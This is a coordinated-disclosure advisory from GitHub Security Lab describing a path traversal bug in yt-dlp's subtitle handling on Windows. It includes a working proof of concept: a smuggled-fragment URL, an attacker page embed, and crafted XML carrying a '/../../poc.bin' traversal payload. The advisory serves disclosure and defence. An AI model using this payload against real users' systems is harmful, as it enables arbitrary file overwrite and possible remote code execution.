Coordinated Disclosure Timeline

Summary

yt-dlp doesn’t validate the subtitle extension name, which makes its Windows users vulnerable to path traversal and allows for arbitrary binary file overwrite when downloading a video with subtitles from a crafted link.

Project

yt-dlp

Tested Version

v2024.04.09

Details

Path traversal saving subtitles (GHSL-2024-090)

yt-dlp can download not only video files but also the accompanying subtitles if the user specifies the --write-subs, --write-auto-subs, --all-subs or --write-srt option. Each supported video website has a dedicated extractor. Some extractors provide only the subtitle URLs, and yt-dlp derives the extension from the URL path. Others provide both the URLs and the subtitle extensions explicitly. Of the latter, some validate the extracted subtitle extension, while others trust the extracted value blindly.

yt-dlp honors the provided extension and uses it to build the name of the subtitle output file at [1]. There, filename is the generated name of the video file, sub_lang is en by default, sub_format is the extracted subtitle extension, and info_dict.get('ext') is the video file extension that subtitles_filename replaces with sub_lang and sub_format. The subtitle is written as a binary file at [2]. If the user doesn’t override the default output template %(title)s [%(id)s].%(ext)s, sub_filename has the form %(title)s [%(id)s].%(sub_lang)s.%(sub_format)s.

The path traversal injection in sub_format doesn’t work on Linux, because Linux rejects paths such as not_existing_folder/../../file whose leading component does not exist. It does work on Windows, which collapses the .. components before it touches the file system.

        for sub_lang, sub_info in subtitles.items():
            sub_format = sub_info['ext']
            sub_filename = subtitles_filename(filename, sub_lang, sub_format, info_dict.get('ext')) # <------------- [1]
            sub_filename_final = subtitles_filename(sub_filename_base, sub_lang, sub_format, info_dict.get('ext'))
            existing_sub = self.existing_file((sub_filename_final, sub_filename))
            if existing_sub:
                self.to_screen(f'[info] Video subtitle {sub_lang}.{sub_format} is already present')
                sub_info['filepath'] = existing_sub
                ret.append((existing_sub, sub_filename_final))
                continue

            self.to_screen(f'[info] Writing video subtitles to: {sub_filename}')
#...

            try:
                sub_copy = sub_info.copy()
                sub_copy.setdefault('http_headers', info_dict.get('http_headers'))
                self.dl(sub_filename, sub_copy, subtitle=True) # <------------- [2]
                sub_info['filepath'] = sub_filename
                ret.append((sub_filename, sub_filename_final))
#...
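
The effect of an unvalidated sub_format can be reproduced without yt-dlp. The sketch below is a simplified stand-in, not yt-dlp's actual subtitles_filename: the helper build_sub_filename and the sample title and id are hypothetical. It relies on Python's ntpath module, which applies Windows path rules on any platform, to show where the resulting name points once the .. components are collapsed.

```python
import ntpath
import posixpath


def build_sub_filename(video_filename, sub_lang, sub_format, video_ext):
    """Hypothetical, simplified stand-in for yt-dlp's subtitles_filename:
    swap the video extension for '<sub_lang>.<sub_format>'."""
    stem, ext = posixpath.splitext(video_filename)
    base = stem if ext[1:] == video_ext else video_filename
    return f'{base}.{sub_lang}.{sub_format}'


# Assumed sample values; sub_format is the payload used in the PoC XML.
video_filename = '01 Introduction [abc123].mp4'
sub_filename = build_sub_filename(video_filename, 'en', '/../../poc.bin', 'mp4')

# Windows path rules collapse '<name>/..' lexically, so the bogus first
# component never has to exist and the result escapes the download directory.
normalized = ntpath.normpath(sub_filename)

print(sub_filename)
print(normalized)
```

With these assumed inputs the normalized name resolves to poc.bin in the parent of the download directory; a payload with more .. components would climb further.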

Exploitability and Proof of Concept (PoC)

Intentionally crafted subtitle extension names served by a supported website (such as youtube.com or bbc.co.uk) are outside the threat model of this report. However, such a website may be compromised at some point: an XSS or SQL injection flaw would allow an attacker to exploit a specific yt-dlp extractor. The attacker would then need to wait for any yt-dlp user, or trick a specific one, to download the video with subtitles. Other yt-dlp features, however, allow exploitation without compromising the video hosting website:

  1. URL smuggling. Some yt-dlp extractors attempt to read additional information from the part of the URL that comes after #, the fragment. The fragment is URL-decoded and parsed as JSON. The extractor for Microsoft Virtual Academy, for example, parses the fragment [1], retrieves base_url from it [2], and then downloads an XML file from that URL [3]. The subtitle extension is extracted from the XML file. If a user is tricked into running, for example, yt-dlp --write-subs https://mva.microsoft.com/en-US/training-courses/microsoft-azure-fundamentals-virtual-machines-11788?l=gfVXISmEB_6804984382#__youtubedl_smuggle=%7B%22base_url%22%3A+%22http%3A%2F%2Fsite.com%22%7D, yt-dlp will use an XML file from an attacker-controlled site, site.com in this case, to extract subtitles and video files.
         url, smuggled_data = unsmuggle_url(url, {})  # <------------- [1]

         mobj = self._match_valid_url(url)
         course_id = mobj.group('course_id')
         video_id = mobj.group('id')

         base_url = smuggled_data.get('base_url') or self._extract_base_url(course_id, video_id)  # <------------- [2]

         settings = self._download_xml(
             '%s/content/content_%s/videosettings.xml?v=1' % (base_url, video_id),  # <------------- [3]
             video_id, 'Downloading video settings XML')
    
  2. Generic extractor. yt-dlp can download videos from arbitrary pages that embed videos from supported websites. This allows the attacker to hide the smuggled fragment from a yt-dlp user, who only needs to run yt-dlp --write-subs https://attacker.com/poc.html.
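
The smuggled fragment in the example URL can be reproduced and decoded with the standard library alone. The sketch below is an illustration rather than yt-dlp's unsmuggle_url; the helper names smuggle and unsmuggle are hypothetical, and only the __youtubedl_smuggle key and the base_url payload come from the URL above.

```python
import json
from urllib.parse import parse_qs, urlencode


def smuggle(url, data):
    """Hypothetical helper: append JSON data as a URL-encoded fragment."""
    return url + '#' + urlencode({'__youtubedl_smuggle': json.dumps(data)})


def unsmuggle(url):
    """Hypothetical helper: split off the fragment and parse it as JSON."""
    base, sep, fragment = url.rpartition('#')
    if not sep or '__youtubedl_smuggle' not in fragment:
        return url, {}
    payload = parse_qs(fragment)['__youtubedl_smuggle'][0]
    return base, json.loads(payload)


page = ('https://mva.microsoft.com/en-US/training-courses/'
        'microsoft-azure-fundamentals-virtual-machines-11788'
        '?l=gfVXISmEB_6804984382')
crafted = smuggle(page, {'base_url': 'http://site.com'})
clean_url, smuggled_data = unsmuggle(crafted)

print(crafted)
print(smuggled_data)
```

Because the fragment is attacker-supplied text, any value read from it, such as base_url, is untrusted input to the extractor.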

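For a PoC, the attacker-hosted page (poc.html in the command above) only needs to embed the smuggled URL:

<class="embedly-card" href="https://mva.microsoft.com/en-US/training-courses/microsoft-azure-fundamentals-virtual-machines-11788?l=gfVXISmEB_6804984382#__youtubedl_smuggle=%7B%22base_url%22%3A+%22http%3A%2F%2F127.0.0.1%3A8000%22%7D">

The server at the smuggled base_url (http://127.0.0.1:8000 here) returns the following video settings XML, with the traversal payload in the type attribute of MarkerResourceSource:

<videoSettings version="1.5">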
  <PlaylistItems>
    <PlaylistItem>
      <MediaSources videoType="progressive"><MediaSource videoMode="720p" mimeType="video/mp4" codec="avc1.42E01E,mp4a.40.2" default="true">http://video.ch9.ms/ch9/1089/193d8990-f065-432e-87d7-981c61e41089/636AzureFundamentalsVM01_high.mp4</MediaSource><MediaSource videoMode="540p" mimeType="video/mp4" codec="avc1.42E01E,mp4a.40.2" default="false">http://video.ch9.ms/ch9/1089/193d8990-f065-432e-87d7-981c61e41089/636AzureFundamentalsVM01_mid.mp4</MediaSource><MediaSource videoMode="360p" mimeType="video/mp4" codec="avc1.42E01E,mp4a.40.2" default="false">https://sec.ch9.ms/ch9/1089/193d8990-f065-432e-87d7-981c61e41089/636AzureFundamentalsVM01.mp4</MediaSource></MediaSources>
      <MediaSource />
      <Title>01 | Introduction</Title>
      <MarkerResourceSource type="/../../poc.bin">content/content_gfvxismeb_6804984382/subtitles</MarkerResourceSource>
      <ThumbSource />
    </PlaylistItem>
  </PlaylistItems>
</videoSettings>
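
To see what an extractor would receive from this document, the XML can be parsed directly. The sketch below uses a trimmed copy of the PoC XML and assumes, based on the PoC, that the type attribute of MarkerResourceSource is the value that ends up as the subtitle extension. The is_plain_extension check is a hypothetical example of the kind of validation the Summary says is missing, not yt-dlp's actual fix.

```python
import re
import xml.etree.ElementTree as ET

# Trimmed copy of the PoC XML; only the title and subtitle elements are kept.
POC_XML = """
<videoSettings version="1.5">
  <PlaylistItems>
    <PlaylistItem>
      <Title>01 | Introduction</Title>
      <MarkerResourceSource type="/../../poc.bin">content/content_gfvxismeb_6804984382/subtitles</MarkerResourceSource>
    </PlaylistItem>
  </PlaylistItems>
</videoSettings>
"""


def is_plain_extension(ext):
    """Hypothetical check: accept only short alphanumeric extensions."""
    return re.fullmatch(r'[A-Za-z0-9]{1,8}', ext) is not None


root = ET.fromstring(POC_XML.strip())
source = root.find('.//MarkerResourceSource')
sub_ext = source.get('type')  # assumed to become the subtitle extension
sub_path = source.text        # relative location of the subtitle file

print(sub_ext, is_plain_extension(sub_ext))
print('vtt', is_plain_extension('vtt'))
```

A check of this shape would reject the PoC payload while accepting ordinary extensions; an allowlist of known subtitle formats would be stricter still.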

Impact

This issue may lead to unauthorized file system modification and, if an executable file is overwritten, to remote code execution.

CVE

Credit

This issue was discovered and reported by GHSL team member @JarLob (Jaroslav Lobačevski).

Contact

You can contact the GHSL team at securitylab@github.com. Please include a reference to GHSL-2024-090 in any communication regarding this issue.